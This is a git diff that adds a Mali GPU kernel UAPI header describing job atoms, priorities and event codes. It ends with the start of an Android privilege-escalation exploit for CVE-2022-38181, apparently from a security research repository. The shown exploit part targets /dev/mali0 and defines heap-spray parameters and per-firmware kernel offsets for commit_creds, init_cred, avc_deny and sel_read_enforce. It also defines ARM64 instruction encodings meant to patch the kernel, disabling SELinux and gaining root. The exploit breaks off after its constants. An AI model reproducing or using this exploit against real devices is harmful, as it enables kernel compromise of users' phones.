+ BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \
+ BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \
+ BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK))
+
+/* Mask of all bits in base_jd_core_req that control the type of the atom.
+ *
+ * This allows dependency only atoms to have flags set
+ */
+#define BASE_JD_REQ_ATOM_TYPE \
+ (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \
+ BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE)
+
+/**
+ * Mask of all bits in base_jd_core_req that control the type of a soft job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f)
+
+/* Returns non-zero value if core requirements passed define a soft job or
+ * a dependency only job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \
+ (((core_req) & BASE_JD_REQ_SOFT_JOB) || \
+ ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP)
+
+/**
+ * enum kbase_jd_atom_state
+ *
+ * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used.
+ * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD.
+ * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running).
+ * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet
+ * handed back to job dispatcher for
+ * dependency resolution.
+ * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed
+ * back to userspace.
+ */
+enum kbase_jd_atom_state {
+ KBASE_JD_ATOM_STATE_UNUSED,
+ KBASE_JD_ATOM_STATE_QUEUED,
+ KBASE_JD_ATOM_STATE_IN_JS,
+ KBASE_JD_ATOM_STATE_HW_COMPLETED,
+ KBASE_JD_ATOM_STATE_COMPLETED
+};
+
+/**
+ * typedef base_atom_id - Type big enough to store an atom number in.
+ */
+typedef __u8 base_atom_id;
+
+/**
+ * struct base_dependency -
+ *
+ * @atom_id: An atom number
+ * @dependency_type: Dependency type
+ */
+struct base_dependency {
+ base_atom_id atom_id;
+ base_jd_dep_type dependency_type;
+};
+
+/**
+ * struct base_jd_fragment - Set of GPU fragment job chains used for rendering.
+ *
+ * @norm_read_norm_write: Job chain for full rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not exceed
+ * its memory usage threshold and no fragment job chain
+ * was previously run for the same renderpass.
+ * It is used no more than once per renderpass.
+ * @norm_read_forced_write: Job chain for starting incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain exceeded
+ * its memory usage threshold for the first time and
+ * no fragment job chain was previously run for the
+ * same renderpass.
+ * Writes unresolved multisampled and normally-
+ * discarded output to temporary buffers that must be
+ * read back by a subsequent forced_read job chain
+ * before the renderpass is complete.
+ * It is used no more than once per renderpass.
+ * @forced_read_forced_write: Job chain for continuing incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain
+ * exceeded its memory usage threshold again
+ * and a fragment job chain was previously run for
+ * the same renderpass.
+ * Reads unresolved multisampled and
+ * normally-discarded output from temporary buffers
+ * written by a previous forced_write job chain and
+ * writes the same to temporary buffers again.
+ * It is used as many times as required until
+ * rendering completes.
+ * @forced_read_norm_write: Job chain for ending incremental rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not
+ * exceed its memory usage threshold this time and a
+ * fragment job chain was previously run for the same
+ * renderpass.
+ * Reads unresolved multisampled and normally-discarded
+ * output from temporary buffers written by a previous
+ * forced_write job chain in order to complete a
+ * renderpass.
+ * It is used no more than once per renderpass.
+ *
+ * This structure is referenced by the main atom structure if
+ * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req.
+ */
+struct base_jd_fragment {
+ __u64 norm_read_norm_write;
+ __u64 norm_read_forced_write;
+ __u64 forced_read_forced_write;
+ __u64 forced_read_norm_write;
+};
+
+/**
+ * typedef base_jd_prio - Base Atom priority.
+ *
+ * Only certain priority levels are actually implemented, as specified by the
+ * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority
+ * level that is not one of those defined below.
+ *
+ * Priority levels only affect scheduling after the atoms have had dependencies
+ * resolved. For example, a low priority atom that has had its dependencies
+ * resolved might run before a higher priority atom that has not had its
+ * dependencies resolved.
+ *
+ * In general, fragment atoms do not affect non-fragment atoms with
+ * lower priorities, and vice versa. One exception is that there is only one
+ * priority value for each context. So a high-priority (e.g.) fragment atom
+ * could increase its context priority, causing its non-fragment atoms to also
+ * be scheduled sooner.
+ *
+ * The atoms are scheduled as follows with respect to their priorities:
+ * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies
+ * resolved, and atom 'X' has a higher priority than atom 'Y'
+ * * If atom 'Y' is currently running on the HW, then it is interrupted to
+ * allow atom 'X' to run soon after
+ * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing
+ * the next atom to run, atom 'X' will always be chosen instead of atom 'Y'
+ * * Any two atoms that have the same priority could run in any order with
+ * respect to each other. That is, there is no ordering constraint between
+ * atoms of the same priority.
+ *
+ * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are
+ * scheduled between contexts. The default value, 0, will cause higher-priority
+ * atoms to be scheduled first, regardless of their context. The value 1 will
+ * use a round-robin algorithm when deciding which context's atoms to schedule
+ * next, so higher-priority atoms can only preempt lower priority atoms within
+ * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and
+ * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details.
+ */
+typedef __u8 base_jd_prio;
+
+/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */
+#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0)
+/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and
+ * BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_HIGH ((base_jd_prio)1)
+/* Low atom priority. */
+#define BASE_JD_PRIO_LOW ((base_jd_prio)2)
+/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH,
+ * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3)
+
+/* Count of the number of priority levels. This itself is not a valid
+ * base_jd_prio setting
+ */
+#define BASE_JD_NR_PRIO_LEVELS 4
+
+/**
+ * struct base_jd_atom_v2 - Node of a dependency graph used to submit a
+ * GPU job chain or soft-job to the kernel driver.
+ *
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep:        Pre-dependencies. One needs to use a SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ *
+ * This structure has changed since UK 10.2 for which base_jd_core_req was a
+ * __u16 value.
+ *
+ * In UK 10.3 a core_req field of a __u32 type was added to the end of the
+ * structure, and the place in the structure previously occupied by __u16
+ * core_req was kept but renamed to compat_core_req.
+ *
+ * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2].
+ * Compatibility with UK 10.x from UK 11.y is not handled because
+ * the major version increase prevents this.
+ *
+ * For UK 11.20 jit_id[2] must be initialized to zero.
+ */
+struct base_jd_atom_v2 {
+ __u64 jc;
+ struct base_jd_udata udata;
+ __u64 extres_list;
+ __u16 nr_extres;
+ __u8 jit_id[2];
+ struct base_dependency pre_dep[2];
+ base_atom_id atom_number;
+ base_jd_prio prio;
+ __u8 device_nr;
+ __u8 jobslot;
+ base_jd_core_req core_req;
+ __u8 renderpass_id;
+ __u8 padding[7];
+};
+
+/**
+ * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr
+ * at the beginning.
+ *
+ * @seq_nr: Sequence number of logical grouping of atoms.
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep:        Pre-dependencies. One needs to use a SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ */
+typedef struct base_jd_atom {
+ __u64 seq_nr;
+ __u64 jc;
+ struct base_jd_udata udata;
+ __u64 extres_list;
+ __u16 nr_extres;
+ __u8 jit_id[2];
+ struct base_dependency pre_dep[2];
+ base_atom_id atom_number;
+ base_jd_prio prio;
+ __u8 device_nr;
+ __u8 jobslot;
+ base_jd_core_req core_req;
+ __u8 renderpass_id;
+ __u8 padding[7];
+} base_jd_atom;
+
+struct base_jit_alloc_info {
+ __u64 gpu_alloc_addr;
+ __u64 va_pages;
+ __u64 commit_pages;
+ __u64 extension;
+ __u8 id;
+ __u8 bin_id;
+ __u8 max_allocations;
+ __u8 flags;
+ __u8 padding[2];
+ __u16 usage_id;
+ __u64 heap_info_gpu_addr;
+};
+
+/* Job chain event code bits
+ * Defines the bits used to create ::base_jd_event_code
+ */
+enum {
+ BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */
+ BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */
+ /* Event indicates success (SW events only) */
+ BASE_JD_SW_EVENT_SUCCESS = (1u << 13),
+ BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */
+ BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */
+ BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */
+ BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */
+ /* Mask to extract the type from an event code */
+ BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11)
+};
+
+/**
+ * enum base_jd_event_code - Job chain event codes
+ *
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status
+ * codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault, because the
+ * job was hard-stopped.
+ * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as
+ * 'previous job done'.
+ * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes
+ * TERMINATED, DONE or JOB_CANCELLED.
+ * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job
+ * was hard stopped.
+ * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on
+ * complete/fail/cancel.
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault,
+ * because the job was hard-stopped.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status
+ * codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes.
+ * Such codes are never returned to
+ * user-space.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes.
+ * @BASE_JD_EVENT_DONE: atom has completed successfully
+ * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which
+ * shall result in a failed atom
+ * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the
+ * part of the memory system required to access
+ * job descriptors was not powered on
+ * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the
+ * specified affinity mask does not intersect
+ * any available cores
+ * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job
+ * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program
+ * counter was executed.
+ * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal
+ * encoding was executed.
+ * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where
+ * the instruction encoding did not match the
+ * instruction type encoded in the program
+ * counter.
+ * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that
+ * contained invalid combinations of operands.
+ * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried
+ * to access the thread local storage section
+ * of another thread.
+ * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that
+ * tried to do an unsupported unaligned memory
+ * access.
+ * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that
+ * failed to complete an instruction barrier.
+ * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job
+ * contains invalid combinations of data.
+ * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to
+ * process a tile that is entirely outside the
+ * bounding box of the frame.
+ * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address
+ * has been found that exceeds the virtual
+ * address range.
+ * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job.
+ * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only
+ *                         the first one that reports an error will set
+ * and return full error information.
+ * Subsequent failing jobs will not update the
+ * error status registers, and may write an
+ * error status of UNKNOWN.
+ * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to
+ * physical memory where the original virtual
+ * address is no longer available.
+ * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache
+ * has detected that the same line has been
+ * accessed as both shareable and non-shareable
+ * memory from inside the GPU.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table
+ * entry at level 1 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table
+ * entry at level 2 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table
+ * entry at level 3 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table
+ * entry at level 4 of the translation table.
+ * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to
+ * the permission flags set in translation
+ * table
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading
+ * level 0 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading
+ * level 1 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading
+ * level 2 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading
+ * level 3 of the translation tables.
+ * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a
+ * translation table entry with the ACCESS_FLAG
+ * bit set to zero in level 0 of the
+ * page table, and the DISABLE_AF_FAULT flag
+ * was not set.
+ * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to
+ * grow memory on demand
+ * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its
+ * dependencies failed
+ * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data
+ * in the atom which overlaps with
+ * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the
+ * platform doesn't support the feature specified in
+ * the atom.
+ * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used
+ * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used
+ * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate
+ * to userspace that the KBase context has been
+ * destroyed and Base should stop listening for
+ * further events
+ * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in
+ * the GPU has to be retried (but it has not
+ * started) due to e.g., GPU reset
+ * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal
+ * the completion of a renderpass. This value
+ * shouldn't be returned to userspace but I haven't
+ * seen where it is reset back to JD_EVENT_DONE.
+ *
+ * HW and low-level SW events are represented by event codes.
+ * The status of jobs which succeeded are also represented by
+ * an event code (see @BASE_JD_EVENT_DONE).
+ * Events are usually reported as part of a &struct base_jd_event.
+ *
+ * The event codes are encoded in the following way:
+ * * 10:0 - subtype
+ * * 12:11 - type
+ * * 13 - SW success (only valid if the SW bit is set)
+ * * 14 - SW event (HW event if not set)
+ * * 15 - Kernel event (should never be seen in userspace)
+ *
+ * Events are split up into ranges as follows:
+ * * BASE_JD_EVENT_RANGE_&lt;RANGE_NAME&gt;_START
+ * * BASE_JD_EVENT_RANGE_&lt;RANGE_NAME&gt;_END
+ *
+ * code is in &lt;RANGE_NAME&gt;'s range when:
+ * BASE_JD_EVENT_RANGE_&lt;RANGE_NAME&gt;_START <= code <
+ * BASE_JD_EVENT_RANGE_&lt;RANGE_NAME&gt;_END
+ *
+ * Ranges can be asserted for adjacency by testing that the END of the previous
+ * is equal to the START of the next. This is useful for optimizing some tests
+ * for range.
+ *
+ * A limitation is that the last member of this enum must explicitly be handled
+ * (with an assert-unreachable statement) in switch statements that use
+ * variables of this type. Otherwise, the compiler warns that we have not
+ * handled that enum value.
+ */
+enum base_jd_event_code {
+ /* HW defined exceptions */
+ BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0,
+
+ /* non-fatal exceptions */
+ BASE_JD_EVENT_NOT_STARTED = 0x00,
+ BASE_JD_EVENT_DONE = 0x01,
+ BASE_JD_EVENT_STOPPED = 0x03,
+ BASE_JD_EVENT_TERMINATED = 0x04,
+ BASE_JD_EVENT_ACTIVE = 0x08,
+
+ BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40,
+ BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40,
+
+ /* job exceptions */
+ BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40,
+ BASE_JD_EVENT_JOB_POWER_FAULT = 0x41,
+ BASE_JD_EVENT_JOB_READ_FAULT = 0x42,
+ BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43,
+ BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44,
+ BASE_JD_EVENT_JOB_BUS_FAULT = 0x48,
+ BASE_JD_EVENT_INSTR_INVALID_PC = 0x50,
+ BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51,
+ BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52,
+ BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53,
+ BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54,
+ BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55,
+ BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56,
+ BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58,
+ BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59,
+ BASE_JD_EVENT_STATE_FAULT = 0x5A,
+ BASE_JD_EVENT_OUT_OF_MEMORY = 0x60,
+ BASE_JD_EVENT_UNKNOWN = 0x7F,
+
+ /* GPU exceptions */
+ BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80,
+ BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88,
+
+ /* MMU exceptions */
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4,
+ BASE_JD_EVENT_PERMISSION_FAULT = 0xC8,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4,
+ BASE_JD_EVENT_ACCESS_FLAG = 0xD8,
+
+ /* SW defined exceptions */
+ BASE_JD_EVENT_MEM_GROWTH_FAILED =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_TIMED_OUT =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001,
+ BASE_JD_EVENT_JOB_CANCELLED =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002,
+ BASE_JD_EVENT_JOB_INVALID =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003,
+ BASE_JD_EVENT_PM_EVENT =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004,
+
+ BASE_JD_EVENT_BAG_INVALID =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003,
+
+ BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+ BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | 0x000,
+
+ BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_BAG_DONE = BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS |
+ BASE_JD_SW_EVENT_BAG | 0x000,
+ BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000,
+
+ BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+ BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | 0x000,
+ BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001,
+
+ BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF
+};
+
+/**
+ * struct base_jd_event_v2 - Event reporting structure
+ *
+ * @event_code: event code.
+ * @atom_number: the atom number that has completed.
+ * @udata: user data.
+ *
+ * This structure is used by the kernel driver to report information
+ * about GPU events. They can either be HW-specific events or low-level
+ * SW events, such as job-chain completion.
+ *
+ * The event code contains an event type field which can be extracted
+ * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK.
+ */
+struct base_jd_event_v2 {
+ enum base_jd_event_code event_code;
+ base_atom_id atom_number;
+ struct base_jd_udata udata;
+};
+
+/**
+ * struct base_dump_cpu_gpu_counters - Structure for
+ * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS
+ * jobs.
+ * @system_time: gpu timestamp
+ * @cycle_counter: gpu cycle count
+ * @sec: cpu time(sec)
+ * @usec: cpu time(usec)
+ * @padding: padding
+ *
+ * This structure is stored into the memory pointed to by the @jc field
+ * of &struct base_jd_atom.
+ *
+ * It must not occupy the same CPU cache line(s) as any neighboring data.
+ * This is to avoid cases where access to pages containing the structure
+ * is shared between cached and un-cached memory regions, which would
+ * cause memory corruption.
+ */
+
+struct base_dump_cpu_gpu_counters {
+ __u64 system_time;
+ __u64 cycle_counter;
+ __u64 sec;
+ __u32 usec;
+ __u8 padding[36];
+};
+
+#endif /* _UAPI_BASE_JM_KERNEL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c
new file mode 100644
index 0000000..5cf4aef
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c
@@ -0,0 +1,796 @@
+/* NOTE(review): the angle-bracketed header names were stripped from this copy
+ * of the patch; reconstructed below from the symbols this file uses
+ * (printf, memset/strcmp, open, mmap/ioctl, err, syscall, usleep,
+ * __system_property_get, uint64_t, ...) -- TODO confirm against upstream. */
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <err.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include <sys/syscall.h>
+#include "stdbool.h"
+#include <sys/system_properties.h>
+#include <sched.h>
+
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "midgard.h"
+
+#ifdef SHELL
+#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
+#else
+#include <android/log.h>
+#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
+
+#endif //SHELL
+
+#define MALI "/dev/mali0"
+
+#define PAGE_SHIFT 12
+
+#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576)
+
+#define PFN_DOWN(x) ((x) >> PAGE_SHIFT)
+
+#define SPRAY_PAGES 25
+
+#define SPRAY_NUM 64
+
+#define FLUSH_SIZE (0x1000 * 0x1000)
+
+#define SPRAY_CPU 0
+
+#define POOL_SIZE 16384
+
+#define RESERVED_SIZE 32
+
+#define TOTAL_RESERVED_SIZE 1024
+
+#define FLUSH_REGION_SIZE 500
+
+#define NUM_TRIALS 100
+
+#define KERNEL_BASE 0x80000000
+
+#define OVERWRITE_INDEX 256
+
+#define ADRP_INIT_INDEX 0
+
+#define ADD_INIT_INDEX 1
+
+#define ADRP_COMMIT_INDEX 2
+
+#define ADD_COMMIT_INDEX 3
+
+#define AVC_DENY_2108 0x92df1c
+
+#define SEL_READ_ENFORCE_2108 0x942ae4
+
+#define INIT_CRED_2108 0x29a0570
+
+#define COMMIT_CREDS_2108 0x180b0c
+
+#define ADD_INIT_2108 0x9115c000
+
+#define ADD_COMMIT_2108 0x912c3108
+
+#define AVC_DENY_2201 0x930af4
+
+#define SEL_READ_ENFORCE_2201 0x9456bc
+
+#define INIT_CRED_2201 0x29b0570
+
+#define COMMIT_CREDS_2201 0x183df0
+
+#define ADD_INIT_2201 0x9115c000
+
+#define ADD_COMMIT_2201 0x9137c108
+
+#define AVC_DENY_2202 0x930b50
+
+#define SEL_READ_ENFORCE_2202 0x94551c
+
+#define INIT_CRED_2202 0x29b0570
+
+#define COMMIT_CREDS_2202 0x183e3c
+
+#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570
+
+#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c
+
+#define AVC_DENY_2207 0x927664
+
+#define SEL_READ_ENFORCE_2207 0x93bf5c
+
+#define INIT_CRED_2207 0x29e07f0
+
+#define COMMIT_CREDS_2207 0x18629c
+
+#define ADD_INIT_2207 0x911fc000 //add x0, x0, #0x7f0
+
